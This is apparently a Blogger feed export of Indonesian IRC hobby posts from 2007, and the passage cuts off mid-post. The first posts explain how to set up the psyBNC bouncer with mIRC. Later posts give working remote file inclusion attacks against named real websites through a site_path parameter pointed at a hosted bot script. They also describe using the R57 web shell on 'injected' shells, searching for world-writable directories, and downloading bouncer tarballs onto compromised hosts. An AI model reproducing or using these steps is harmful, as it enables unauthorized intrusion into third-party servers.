kita. jika kita spesifikasikan&lt;br /&gt;ipnya misal psybnc.HOSTALLOWS.ENTRY=*.* kita beri suatu ip&lt;br /&gt;&lt;br /&gt;ok kita anggap selesai psybnc.conf jika masih bingung biarkan saja seperti aslinya.&lt;br /&gt;langkah selanjutnya kita double klik psybnc.exe&lt;br /&gt;dan psybnc.exe akan dijalankan muncul dos prompt sekilas lalu menghilang bisa kalian check psybnc.exe sudah jalan lewat menu task manager&lt;br /&gt;&lt;br /&gt;sekarang kita pergi ke mirc ( program chating favoritku :P~)&lt;br /&gt;&lt;br /&gt;kita konek ke psybnc kita.&lt;br /&gt;disini saya contohkan ip psybnc adalah 192.168.0.83 dengan port 31337 ident pertama kali bebas dan password kosong jika memakai psybnc.conf default diatas.&lt;br /&gt;&lt;br /&gt;di mirc kita pilih options atau gambar palu di kiri atas.&lt;br /&gt;isikan&lt;br /&gt;full name : nama anda&lt;br /&gt;email address: admin@&lt;br /&gt;nickname : nickmu&lt;br /&gt;alternative: nick-lain&lt;br /&gt;&lt;br /&gt;klik ok&lt;br /&gt;&lt;br /&gt;di status ketik perintah konek berikut&lt;br /&gt;/server 192.168.0.83:31337 &lt;&lt;&lt;&lt; enter&lt;br /&gt;&lt;br /&gt;-Welcome- psyBNC2.3.2-4&lt;br /&gt;-&lt;br /&gt;–psyBNC- Your IRC Client did not support a password. Please type /QUOTE PASS yourpassword to connect.&lt;br /&gt;&lt;br /&gt;/QUOTE PASS 123456 &lt;&lt;&lt; ketik contoh password 123456 (bisa disi password lain)&lt;br /&gt;&lt;br /&gt;status -psyBNC akan muncul:&lt;br /&gt;&lt;br /&gt;&lt;-psyBNC&gt; Welcome xxx !&lt;br /&gt;&lt;-psyBNC&gt; You are the first to connect to this new proxy server.&lt;br /&gt;&lt;-psyBNC&gt; You are the proxy-admin. Use ADDSERVER to add a server so the bouncer may connect.&lt;br /&gt;&lt;-psyBNC&gt; psyBNC2.3.2-4 Help (* = BounceAdmin only)&lt;br /&gt;&lt;-psyBNC&gt; ————————————–&lt;br /&gt;&lt;-psyBNC&gt; BHELP BWHO - Lists all Users on the Bouncer&lt;br /&gt;&lt;-psyBNC&gt; BHELP PASSWORD - Sets your or another Users Password(Admin)&lt;br /&gt;&lt;-psyBNC&gt; BHELP BVHOST - Sets your vhost to connect thru&lt;br /&gt;&lt;-psyBNC&gt; BHELP PROXY - Sets your proxy to connect thru&lt;br /&gt;&lt;-psyBNC&gt; BHELP SETUSERNAME - Sets your User Name&lt;br /&gt;&lt;-psyBNC&gt; BHELP SETAWAY - Sets your away-Text when you leave&lt;br /&gt;&lt;-psyBNC&gt; BHELP SETLEAVEMSG - Sets your Leave-MSG when you leave&lt;br /&gt;&lt;-psyBNC&gt; BHELP LEAVEQUIT - If set to 1, parts all channels on quit&lt;br /&gt;&lt;-psyBNC&gt; BHELP SETAWAYNICK - Sets your nick when you are offline&lt;br /&gt;&lt;-psyBNC&gt; BHELP JUMP - Jumps to the next IRC-Server&lt;br /&gt;&lt;-psyBNC&gt; BHELP BQUIT - Quits your current Server Connection&lt;br /&gt;&lt;-psyBNC&gt; BHELP BCONNECT - Reconnects a bquitted Connection&lt;br /&gt;&lt;-psyBNC&gt; BHELP AIDLE - Enables/Disables Antiidle&lt;br /&gt;&lt;-psyBNC&gt; BHELP AUTOREJOIN - Enables/Disables Auto-Rejoin&lt;br /&gt;&lt;-psyBNC&gt; BHELP ADDSERVER - Adds an IRC-Server to your Serverlist&lt;br /&gt;&lt;-psyBNC&gt; BHELP DELSERVER - Deletes an IRC-Server by number&lt;br /&gt;&lt;-psyBNC&gt; BHELP LISTSERVERS - Lists all IRC-Servers added&lt;br /&gt;&lt;-psyBNC&gt; BHELP ADDNETWORK - Adds a seperate Network to your client&lt;br /&gt;&lt;-psyBNC&gt; BHELP DELNETWORK - Deletes a Network from your client&lt;br /&gt;&lt;-psyBNC&gt; BHELP SWITCHNET - Switches to a given Network&lt;br /&gt;&lt;-psyBNC&gt; BHELP ADDOP - Adds a User who may get Op from you&lt;br /&gt;&lt;-psyBNC&gt; BHELP DELOP - Deletes an added User who got Op&lt;br /&gt;&lt;-psyBNC&gt; BHELP LISTOPS - Lists all added Ops&lt;br /&gt;&lt;-psyBNC&gt; BHELP ADDAUTOOP - Adds a User who gets Auto-Op from you&lt;br /&gt;&lt;-psyBNC&gt; BHELP DELAUTOOP - Deletes an added User who got Op&lt;br /&gt;&lt;-psyBNC&gt; BHELP LISTAUTOOPS - Lists all added Auto-Ops&lt;br /&gt;&lt;-psyBNC&gt; BHELP ADDBAN - Adds a ban (global or to a channel)&lt;br /&gt;&lt;-psyBNC&gt; BHELP DELBAN - Deletes a ban by Number&lt;br /&gt;&lt;-psyBNC&gt; BHELP LISTBANS - Lists all bans&lt;br /&gt;&lt;-psyBNC&gt; BHELP ADDASK - Adds a host/bot to ask Op from&lt;br /&gt;&lt;-psyBNC&gt; BHELP DELASK - Deletes a host/bot to ask Op by Number&lt;br /&gt;&lt;-psyBNC&gt; BHELP LISTASK - Lists the hosts/bots to ask Op from&lt;br /&gt;&lt;-psyBNC&gt; BHELP ADDIGNORE - Adds a hostmask/contentfilter to the ignores&lt;br /&gt;&lt;-psyBNC&gt; BHELP DELIGNORE - Deletes a hostmask/contentfilter from the ignores&lt;br /&gt;&lt;-psyBNC&gt; BHELP LISTIGNORES - Lists the currently added ignores&lt;br /&gt;&lt;-psyBNC&gt; BHELP ADDDCC - Adds a DCC-Connection to a bot&lt;br /&gt;&lt;-psyBNC&gt; BHELP LISTDCC - Lists all added DCC-Connectionc&lt;br /&gt;&lt;-psyBNC&gt; BHELP DELDCC - Deletes a DCC-Connection by number&lt;br /&gt;&lt;-psyBNC&gt; BHELP DCCCHAT - Offers a DCC Chat to a given IRC User&lt;br /&gt;&lt;-psyBNC&gt; BHELP DCCANSWER - Answers to a DCC Chat-Request&lt;br /&gt;&lt;-psyBNC&gt; BHELP DCCENABLE - Enables/Disables DCC thru psybnc&lt;br /&gt;&lt;-psyBNC&gt; BHELP DCCSEND - Sends a file to a given IRC User&lt;br /&gt;&lt;-psyBNC&gt; BHELP DCCGET - Gets a DCC Send File from an IRC User&lt;br /&gt;&lt;-psyBNC&gt; BHELP DCCSENDME - Sends the bouncer User a File&lt;br /&gt;&lt;-psyBNC&gt; BHELP AUTOGETDCC - always get offered Files&lt;br /&gt;&lt;-psyBNC&gt; BHELP DCCCANCEL - Cancels a dccchat or a transfer&lt;br /&gt;&lt;-psyBNC&gt; BHELP PLAYPRIVATELOG - Plays your Message Log&lt;br /&gt;&lt;-psyBNC&gt; BHELP ERASEPRIVATELOG - Erases your Message Log&lt;br /&gt;&lt;-psyBNC&gt; BHELP ADDLOG - Adds a Log source / filter&lt;br /&gt;&lt;-psyBNC&gt; BHELP DELLOG - Deletes a Log source by number&lt;br /&gt;&lt;-psyBNC&gt; BHELP LISTLOGS - Lists all added Log sources/filters&lt;br /&gt;&lt;-psyBNC&gt; BHELP PLAYTRAFFICLOG - Plays the Traffic Log&lt;br /&gt;&lt;-psyBNC&gt; BHELP ERASETRAFFICLOG - Erases the Traffic Log&lt;br /&gt;&lt;-psyBNC&gt; BHELP ENCRYPT - Encrypts talk to a given channel/user&lt;br /&gt;&lt;-psyBNC&gt; BHELP DELENCRYPT - Deletes an encryption entry by number&lt;br /&gt;&lt;-psyBNC&gt; BHELP LISTENCRYPT - Shows a List of encrypted talks&lt;br /&gt;&lt;-psyBNC&gt; BHELP TRANSLATE - Adds a translator to/from channels/users&lt;br /&gt;&lt;-psyBNC&gt; BHELP DELTRANSLATE - Deletes a translator by number&lt;br /&gt;&lt;-psyBNC&gt; BHELP LISTTRANSLATE - Shows a List of translated talks&lt;br /&gt;&lt;-psyBNC&gt; BHELP * BREHASH - Rehashes the proxy and resets all Connections&lt;br /&gt;&lt;-psyBNC&gt; BHELP * MADMIN - Gives a User an Admin flag&lt;br /&gt;&lt;-psyBNC&gt; BHELP * UNADMIN - Removes the Admin flag from a User&lt;br /&gt;&lt;-psyBNC&gt; BHELP * BKILL - Kills a User from the proxy&lt;br /&gt;&lt;-psyBNC&gt; BHELP * SOCKSTAT - Shows/Logs the current Connections&lt;br /&gt;&lt;-psyBNC&gt; BHELP * ADDUSER - Adds a new User to the Bouncer&lt;br /&gt;&lt;-psyBNC&gt; BHELP * DELUSER - Deletes a User from the Bouncer&lt;br /&gt;&lt;-psyBNC&gt; BHELP * NAMEBOUNCER - Names your bouncer (needed for linking)&lt;br /&gt;&lt;-psyBNC&gt; BHELP * LINKTO - Adds a bouncer Link to the Host/Port&lt;br /&gt;&lt;-psyBNC&gt; BHELP * LINKFROM - Adds a bouncer Link from your Bouncer&lt;br /&gt;&lt;-psyBNC&gt; BHELP * RELAYLINK - Allows or disables a relayable Link&lt;br /&gt;&lt;-psyBNC&gt; BHELP * DELLINK - Deletes a Link to a bouncer&lt;br /&gt;&lt;-psyBNC&gt; BHELP LISTLINKS - Lists all Links to/from the Bouncer&lt;br /&gt;&lt;-psyBNC&gt; BHELP * RELINK - Resets a link to a bouncer by number&lt;br /&gt;&lt;-psyBNC&gt; BHELP * PLAYMAINLOG - Plays the Connection Log&lt;br /&gt;&lt;-psyBNC&gt; BHELP * ERASEMAINLOG - Erases the Connection Log&lt;br /&gt;&lt;-psyBNC&gt; BHELP * ADDALLOW - Adds a host allow to connect&lt;br /&gt;&lt;-psyBNC&gt; BHELP * DELALLOW - Deletes a host allow&lt;br /&gt;&lt;-psyBNC&gt; BHELP * LISTALLOW - Lists the host allows on your proxy&lt;br /&gt;&lt;-psyBNC&gt; BHELP SRELOAD - Reloads the Script for the User&lt;br /&gt;&lt;-psyBNC&gt; BHELP LISTTASKS - Lists the current running tasks&lt;br /&gt;&lt;-psyBNC&gt; BHELP * SETLANG - Sets the language (global)&lt;br /&gt;&lt;-psyBNC&gt; BHELP BHELP - Lists this help or help on a topic&lt;br /&gt;&lt;-psyBNC&gt; BHELP Use /QUOTE bhelp &lt;command&gt; for details.&lt;br /&gt;&lt;-psyBNC&gt; BHELP - End of help&lt;br /&gt;&lt;-psyBNC&gt; Fri Jan 4 17:34:25 :New User:admin (xxx) added by admin&lt;br /&gt;&lt;-psyBNC&gt; Fri Jan 4 17:34:31 :User admin () has no server added&lt;br /&gt;&lt;br /&gt;——————————————————————&lt;br /&gt;lalu kita ketik&lt;br /&gt;/addserver irc.dal.net:6667 &lt;&lt;&lt; contoh untuk irc server dalnet&lt;br /&gt;&lt;br /&gt;&lt;-psyBNC&gt; Server irc.dal.net port 6667 (password: None) added.&lt;br /&gt;&lt;-psyBNC&gt; Fri Jan 4 17:37:31 :User admin () trying irc.dal.net port 6667 ().&lt;br /&gt;&lt;-psyBNC&gt; Fri Jan 4 17:37:32 :User admin () connected to irc.dal.net:6667 ()&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-8274317677839587606?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/8274317677839587606'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/8274317677839587606'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/pasang-psybnc_26.html' title='Pasang Psybnc'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-3678513437570567401</id><published>2007-09-26T12:37:00.000+07:00</published><updated>2007-09-26T12:38:00.642+07:00</updated><title type='text'>Pasang Psybnc</title><content type='html'>ok kita ambil contoh file ini&lt;br /&gt;http://www.psybnc.info/download/psybnc2.3.2-4b.exe&lt;br /&gt;file size sekitar 750kb.&lt;br /&gt;kita taruh di c:/&lt;br /&gt;&lt;br /&gt;double klik file psybnc2.3.2-4b.exe&lt;br /&gt;lalu akan ada dialog extract to c:\psybnc\ ikuti saja dengan klik tombol extract&lt;br /&gt;setelah sukses ada kotak pesan “successfully completed the operation” klik ok&lt;br /&gt;sekarang kita double klik folder c:\psybnc&lt;br /&gt;&lt;br /&gt;disitu kita lihat ada file psybnc.exe dan ada psybnc.conf&lt;br /&gt;disini kita bisa edit dulu file psybnc.conf jika ingin merubah port nya yang&lt;br /&gt;defaultnya adalah 31337&lt;br /&gt;berikut contoh pada file psybnc.conf&lt;br /&gt;=================================&lt;br /&gt;PSYBNC.SYSTEM.PORT1=31337&lt;br /&gt;PSYBNC.SYSTEM.HOST1=*&lt;br /&gt;PSYBNC.HOSTALLOWS.ENTRY0=*;*&lt;br /&gt;=================================&lt;br /&gt;baris pertama artinya psybnc listen pada port 31337 artinya nanti kita konek ke port 3317&lt;br /&gt;barius kedua adalah ip listen bisa kita isikan ip dari ipkomputer yang kita install psybnc atau kita beri tanda bintang&lt;br /&gt;yang artinya semua ip terdeteksi di system.&lt;br /&gt;baris ketiga adalah host allow, artinya semua ip bisa loggin ke psybnc kita. jika kita spesifikasikan&lt;br /&gt;ipnya misal psybnc.HOSTALLOWS.ENTRY=*.* kita beri suatu ip&lt;br /&gt;&lt;br /&gt;ok kita anggap selesai psybnc.conf jika masih bingung biarkan saja seperti aslinya.&lt;br /&gt;langkah selanjutnya kita double klik psybnc.exe&lt;br /&gt;dan psybnc.exe akan dijalankan muncul dos prompt sekilas lalu menghilang bisa kalian check psybnc.exe sudah jalan lewat menu task manager&lt;br /&gt;&lt;br /&gt;sekarang kita pergi ke mirc ( program chating favoritku :P~)&lt;br /&gt;&lt;br /&gt;kita konek ke psybnc kita.&lt;br /&gt;disini saya contohkan ip psybnc adalah 192.168.0.83 dengan port 31337 ident pertama kali bebas dan password kosong jika memakai psybnc.conf default diatas.&lt;br /&gt;&lt;br /&gt;di mirc kita pilih options atau gambar palu di kiri atas.&lt;br /&gt;isikan&lt;br /&gt;full name : nama anda&lt;br /&gt;email address: admin@&lt;br /&gt;nickname : nickmu&lt;br /&gt;alternative: nick-lain&lt;br /&gt;&lt;br /&gt;klik ok&lt;br /&gt;&lt;br /&gt;di status ketik perintah konek berikut&lt;br /&gt;/server 192.168.0.83:31337 &lt;&lt;&lt;&lt; enter&lt;br /&gt;&lt;br /&gt;-Welcome- psyBNC2.3.2-4&lt;br /&gt;-&lt;br /&gt;–psyBNC- Your IRC Client did not support a password. Please type /QUOTE PASS yourpassword to connect.&lt;br /&gt;&lt;br /&gt;/QUOTE PASS 123456 &lt;&lt;&lt; ketik contoh password 123456 (bisa disi password lain)&lt;br /&gt;&lt;br /&gt;status -psyBNC akan muncul:&lt;br /&gt;&lt;br /&gt;&lt;-psyBNC&gt; Welcome xxx !&lt;br /&gt;&lt;-psyBNC&gt; You are the first to connect to this new proxy server.&lt;br /&gt;&lt;-psyBNC&gt; You are the proxy-admin. Use ADDSERVER to add a server so the bouncer may connect.&lt;br /&gt;&lt;-psyBNC&gt; psyBNC2.3.2-4 Help (* = BounceAdmin only)&lt;br /&gt;&lt;-psyBNC&gt; ————————————–&lt;br /&gt;&lt;-psyBNC&gt; BHELP BWHO - Lists all Users on the Bouncer&lt;br /&gt;&lt;-psyBNC&gt; BHELP PASSWORD - Sets your or another Users Password(Admin)&lt;br /&gt;&lt;-psyBNC&gt; BHELP BVHOST - Sets your vhost to connect thru&lt;br /&gt;&lt;-psyBNC&gt; BHELP PROXY - Sets your proxy to connect thru&lt;br /&gt;&lt;-psyBNC&gt; BHELP SETUSERNAME - Sets your User Name&lt;br /&gt;&lt;-psyBNC&gt; BHELP SETAWAY - Sets your away-Text when you leave&lt;br /&gt;&lt;-psyBNC&gt; BHELP SETLEAVEMSG - Sets your Leave-MSG when you leave&lt;br /&gt;&lt;-psyBNC&gt; BHELP LEAVEQUIT - If set to 1, parts all channels on quit&lt;br /&gt;&lt;-psyBNC&gt; BHELP SETAWAYNICK - Sets your nick when you are offline&lt;br /&gt;&lt;-psyBNC&gt; BHELP JUMP - Jumps to the next IRC-Server&lt;br /&gt;&lt;-psyBNC&gt; BHELP BQUIT - Quits your current Server Connection&lt;br /&gt;&lt;-psyBNC&gt; BHELP BCONNECT - Reconnects a bquitted Connection&lt;br /&gt;&lt;-psyBNC&gt; BHELP AIDLE - Enables/Disables Antiidle&lt;br /&gt;&lt;-psyBNC&gt; BHELP AUTOREJOIN - Enables/Disables Auto-Rejoin&lt;br /&gt;&lt;-psyBNC&gt; BHELP ADDSERVER - Adds an IRC-Server to your Serverlist&lt;br /&gt;&lt;-psyBNC&gt; BHELP DELSERVER - Deletes an IRC-Server by number&lt;br /&gt;&lt;-psyBNC&gt; BHELP LISTSERVERS - Lists all IRC-Servers added&lt;br /&gt;&lt;-psyBNC&gt; BHELP ADDNETWORK - Adds a seperate Network to your client&lt;br /&gt;&lt;-psyBNC&gt; BHELP DELNETWORK - Deletes a Network from your client&lt;br /&gt;&lt;-psyBNC&gt; BHELP SWITCHNET - Switches to a given Network&lt;br /&gt;&lt;-psyBNC&gt; BHELP ADDOP - Adds a User who may get Op from you&lt;br /&gt;&lt;-psyBNC&gt; BHELP DELOP - Deletes an added User who got Op&lt;br /&gt;&lt;-psyBNC&gt; BHELP LISTOPS - Lists all added Ops&lt;br /&gt;&lt;-psyBNC&gt; BHELP ADDAUTOOP - Adds a User who gets Auto-Op from you&lt;br /&gt;&lt;-psyBNC&gt; BHELP DELAUTOOP - Deletes an added User who got Op&lt;br /&gt;&lt;-psyBNC&gt; BHELP LISTAUTOOPS - Lists all added Auto-Ops&lt;br /&gt;&lt;-psyBNC&gt; BHELP ADDBAN - Adds a ban (global or to a channel)&lt;br /&gt;&lt;-psyBNC&gt; BHELP DELBAN - Deletes a ban by Number&lt;br /&gt;&lt;-psyBNC&gt; BHELP LISTBANS - Lists all bans&lt;br /&gt;&lt;-psyBNC&gt; BHELP ADDASK - Adds a host/bot to ask Op from&lt;br /&gt;&lt;-psyBNC&gt; BHELP DELASK - Deletes a host/bot to ask Op by Number&lt;br /&gt;&lt;-psyBNC&gt; BHELP LISTASK - Lists the hosts/bots to ask Op from&lt;br /&gt;&lt;-psyBNC&gt; BHELP ADDIGNORE - Adds a hostmask/contentfilter to the ignores&lt;br /&gt;&lt;-psyBNC&gt; BHELP DELIGNORE - Deletes a hostmask/contentfilter from the ignores&lt;br /&gt;&lt;-psyBNC&gt; BHELP LISTIGNORES - Lists the currently added ignores&lt;br /&gt;&lt;-psyBNC&gt; BHELP ADDDCC - Adds a DCC-Connection to a bot&lt;br /&gt;&lt;-psyBNC&gt; BHELP LISTDCC - Lists all added DCC-Connectionc&lt;br /&gt;&lt;-psyBNC&gt; BHELP DELDCC - Deletes a DCC-Connection by number&lt;br /&gt;&lt;-psyBNC&gt; BHELP DCCCHAT - Offers a DCC Chat to a given IRC User&lt;br /&gt;&lt;-psyBNC&gt; BHELP DCCANSWER - Answers to a DCC Chat-Request&lt;br /&gt;&lt;-psyBNC&gt; BHELP DCCENABLE - Enables/Disables DCC thru psybnc&lt;br /&gt;&lt;-psyBNC&gt; BHELP DCCSEND - Sends a file to a given IRC User&lt;br /&gt;&lt;-psyBNC&gt; BHELP DCCGET - Gets a DCC Send File from an IRC User&lt;br /&gt;&lt;-psyBNC&gt; BHELP DCCSENDME - Sends the bouncer User a File&lt;br /&gt;&lt;-psyBNC&gt; BHELP AUTOGETDCC - always get offered Files&lt;br /&gt;&lt;-psyBNC&gt; BHELP DCCCANCEL - Cancels a dccchat or a transfer&lt;br /&gt;&lt;-psyBNC&gt; BHELP PLAYPRIVATELOG - Plays your Message Log&lt;br /&gt;&lt;-psyBNC&gt; BHELP ERASEPRIVATELOG - Erases your Message Log&lt;br /&gt;&lt;-psyBNC&gt; BHELP ADDLOG - Adds a Log source / filter&lt;br /&gt;&lt;-psyBNC&gt; BHELP DELLOG - Deletes a Log source by number&lt;br /&gt;&lt;-psyBNC&gt; BHELP LISTLOGS - Lists all added Log sources/filters&lt;br /&gt;&lt;-psyBNC&gt; BHELP PLAYTRAFFICLOG - Plays the Traffic Log&lt;br /&gt;&lt;-psyBNC&gt; BHELP ERASETRAFFICLOG - Erases the Traffic Log&lt;br /&gt;&lt;-psyBNC&gt; BHELP ENCRYPT - Encrypts talk to a given channel/user&lt;br /&gt;&lt;-psyBNC&gt; BHELP DELENCRYPT - Deletes an encryption entry by number&lt;br /&gt;&lt;-psyBNC&gt; BHELP LISTENCRYPT - Shows a List of encrypted talks&lt;br /&gt;&lt;-psyBNC&gt; BHELP TRANSLATE - Adds a translator to/from channels/users&lt;br /&gt;&lt;-psyBNC&gt; BHELP DELTRANSLATE - Deletes a translator by number&lt;br /&gt;&lt;-psyBNC&gt; BHELP LISTTRANSLATE - Shows a List of translated talks&lt;br /&gt;&lt;-psyBNC&gt; BHELP * BREHASH - Rehashes the proxy and resets all Connections&lt;br /&gt;&lt;-psyBNC&gt; BHELP * MADMIN - Gives a User an Admin flag&lt;br /&gt;&lt;-psyBNC&gt; BHELP * UNADMIN - Removes the Admin flag from a User&lt;br /&gt;&lt;-psyBNC&gt; BHELP * BKILL - Kills a User from the proxy&lt;br /&gt;&lt;-psyBNC&gt; BHELP * SOCKSTAT - Shows/Logs the current Connections&lt;br /&gt;&lt;-psyBNC&gt; BHELP * ADDUSER - Adds a new User to the Bouncer&lt;br /&gt;&lt;-psyBNC&gt; BHELP * DELUSER - Deletes a User from the Bouncer&lt;br /&gt;&lt;-psyBNC&gt; BHELP * NAMEBOUNCER - Names your bouncer (needed for linking)&lt;br /&gt;&lt;-psyBNC&gt; BHELP * LINKTO - Adds a bouncer Link to the Host/Port&lt;br /&gt;&lt;-psyBNC&gt; BHELP * LINKFROM - Adds a bouncer Link from your Bouncer&lt;br /&gt;&lt;-psyBNC&gt; BHELP * RELAYLINK - Allows or disables a relayable Link&lt;br /&gt;&lt;-psyBNC&gt; BHELP * DELLINK - Deletes a Link to a bouncer&lt;br /&gt;&lt;-psyBNC&gt; BHELP LISTLINKS - Lists all Links to/from the Bouncer&lt;br /&gt;&lt;-psyBNC&gt; BHELP * RELINK - Resets a link to a bouncer by number&lt;br /&gt;&lt;-psyBNC&gt; BHELP * PLAYMAINLOG - Plays the Connection Log&lt;br /&gt;&lt;-psyBNC&gt; BHELP * ERASEMAINLOG - Erases the Connection Log&lt;br /&gt;&lt;-psyBNC&gt; BHELP * ADDALLOW - Adds a host allow to connect&lt;br /&gt;&lt;-psyBNC&gt; BHELP * DELALLOW - Deletes a host allow&lt;br /&gt;&lt;-psyBNC&gt; BHELP * LISTALLOW - Lists the host allows on your proxy&lt;br /&gt;&lt;-psyBNC&gt; BHELP SRELOAD - Reloads the Script for the User&lt;br /&gt;&lt;-psyBNC&gt; BHELP LISTTASKS - Lists the current running tasks&lt;br /&gt;&lt;-psyBNC&gt; BHELP * SETLANG - Sets the language (global)&lt;br /&gt;&lt;-psyBNC&gt; BHELP BHELP - Lists this help or help on a topic&lt;br /&gt;&lt;-psyBNC&gt; BHELP Use /QUOTE bhelp &lt;command&gt; for details.&lt;br /&gt;&lt;-psyBNC&gt; BHELP - End of help&lt;br /&gt;&lt;-psyBNC&gt; Fri Jan 4 17:34:25 :New User:admin (xxx) added by admin&lt;br /&gt;&lt;-psyBNC&gt; Fri Jan 4 17:34:31 :User admin () has no server added&lt;br /&gt;&lt;br /&gt;——————————————————————&lt;br /&gt;lalu kita ketik&lt;br /&gt;/addserver irc.dal.net:6667 &lt;&lt;&lt; contoh untuk irc server dalnet&lt;br /&gt;&lt;br /&gt;&lt;-psyBNC&gt; Server irc.dal.net port 6667 (password: None) added.&lt;br /&gt;&lt;-psyBNC&gt; Fri Jan 4 17:37:31 :User admin () trying irc.dal.net port 6667 ().&lt;br /&gt;&lt;-psyBNC&gt; Fri Jan 4 17:37:32 :User admin () connected to irc.dal.net:6667 ()&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-3678513437570567401?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/3678513437570567401'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/3678513437570567401'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/pasang-psybnc.html' title='Pasang Psybnc'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-727233764502713184</id><published>2007-09-26T12:25:00.000+07:00</published><updated>2007-09-26T12:26:46.136+07:00</updated><title type='text'>buat botLouD iRC</title><content type='html'>Pertama tama u siapin shell injekan kamu.. kalo gak punya minta aja&lt;br /&gt;sama master2 irc atau u beli sheLL kalo malu mintak :P&lt;br /&gt;&lt;br /&gt;contoh:&lt;br /&gt;http://thephotobucket.net/index.php?_config[site_path]= &lt;&lt;&lt;– targetan Nya&lt;br /&gt;&lt;br /&gt;http://geocities.com/banjarworo/loud.txt &lt;&lt;– scriptnya&lt;br /&gt;&lt;br /&gt;kamu edit chanel ama adminya yang discript terus&lt;br /&gt;&lt;br /&gt;simpen ke web kamu dengan nama .txt&lt;br /&gt;&lt;br /&gt;dah gitu gabungin jadi satu target ama scriptnya&lt;br /&gt;&lt;br /&gt;contoh :&lt;br /&gt;&lt;br /&gt;http://thephotobucket.net/index.php?_config[site_path]=http://geoc&lt;br /&gt;&lt;br /&gt;ities.com/web_kamu/loud.txt? jadi deh&lt;br /&gt;&lt;br /&gt;kamu tunggu aja dichanel kamu .. chanel yang diedit tadi&lt;br /&gt;&lt;br /&gt;kalo masih bingung contac me&lt;br /&gt;&lt;br /&gt;di #tuban@allnetwork.or.id&lt;br /&gt;&lt;br /&gt;nick “pippo&lt;br /&gt;&lt;br /&gt;thanks yah&lt;br /&gt;&lt;br /&gt;moga berhasiL&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5833266259433587312-727233764502713184?l=mircku.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/727233764502713184'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5833266259433587312/posts/default/727233764502713184'/><link rel='alternate' type='text/html' href='http://mircku.blogspot.com/2007/09/buat-botloud-irc.html' title='buat botLouD iRC'/><author><name>posku</name><uri>http://www.blogger.com/profile/13572930753184865106</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author></entry><entry><id>tag:blogger.com,1999:blog-5833266259433587312.post-4071237590906555087</id><published>2007-09-26T12:24:00.000+07:00</published><updated>2007-09-26T12:25:27.139+07:00</updated><title type='text'>Buat PsY&amp;eggdroPS</title><content type='html'>cd namadirectory = Melihat Suatu directory&lt;br /&gt;&lt;br /&gt;ls -al = Melihat Suatu Directory Lebih Dalam lagi&lt;br /&gt;&lt;br /&gt;fined = Mengecek Directory directory&lt;br /&gt;&lt;br /&gt;cat = Membaca Suatu Berkas&lt;br /&gt;&lt;br /&gt;wget = MengUpload suatu Files&lt;br /&gt;&lt;br /&gt;tar -zxvf = MengExtraxt suatu files yang berbentuk&lt;br /&gt;&lt;br /&gt;tgz&lt;br /&gt;&lt;br /&gt;pwd = Mengetahui Di Directory mana Kita Berada&lt;br /&gt;&lt;br /&gt;uname -a = Keberadaan Path berada&lt;br /&gt;&lt;br /&gt;w = Mengetahui Siapa Saja yang telah menggunakan Shell.&lt;br /&gt;&lt;br /&gt;Cara buat psyBNC..,mungkin bagi para master uda bosen,, :d biarin cuek aje :P&lt;br /&gt;&lt;br /&gt;Login ke shell.. . .. terus .. ..&lt;br /&gt;&lt;br /&gt;-+- find / -type d -perm 777 &lt;&lt;– utk mencari direktory yang lobang :P&lt;br /&gt;&lt;br /&gt;1. wget / lwp-download/ curl -o,/ fetch http://geocities.com/banjarworo/psy.tar.gz&lt;br /&gt;&lt;br /&gt;2. tar -zxvf psy.tar.gz&lt;br /&gt;&lt;br /&gt;3. cd psybnc&lt;br /&gt;&lt;br /&gt;4. ./config port *port yg diinginkan*&lt;br /&gt;&lt;br /&gt;5. ./fuck&lt;br /&gt;&lt;br /&gt;6. ./run&lt;br /&gt;&lt;br /&gt;seLesai Deh…&lt;br /&gt;&lt;br /&gt;tinggaL buka Mirc /server target.com port pass Ident na terserah… yank pertama pake psy itu Langsung Admin…/addserver irc.indo.net.id:6667&lt;br /&gt;&lt;br /&gt;/j #tuban ;p&lt;br /&gt;&lt;br /&gt;“Pippo&lt;br /&gt;&lt;br /&gt;biar rame chanel kuw wkekwke&lt;br /&gt;&lt;br /&gt;————————–eggdrop———————————-&lt;br /&gt;&lt;br /&gt;php injecktioN&lt;br /&gt;&lt;br /&gt;ada bug nya gak ni eggdrop nya? hehe&lt;br /&gt;&lt;br /&gt;pertama- tama login kesheL injecknya.. me biasa make script R57&lt;br /&gt;&lt;br /&gt;http:/geocities.com/banjarworo/pippo.txt&lt;br /&gt;&lt;br /&gt;mIsaL: http://www.timeframeinvestor.com/auth.cookie.inc.php?da_path=&lt;br /&gt;&lt;br /&gt;&lt;&lt;&lt; taarget nya&lt;br /&gt;&lt;br /&gt;peyan tambahin ama script diatas&lt;br /&gt;&lt;br /&gt;contoh:&lt;br 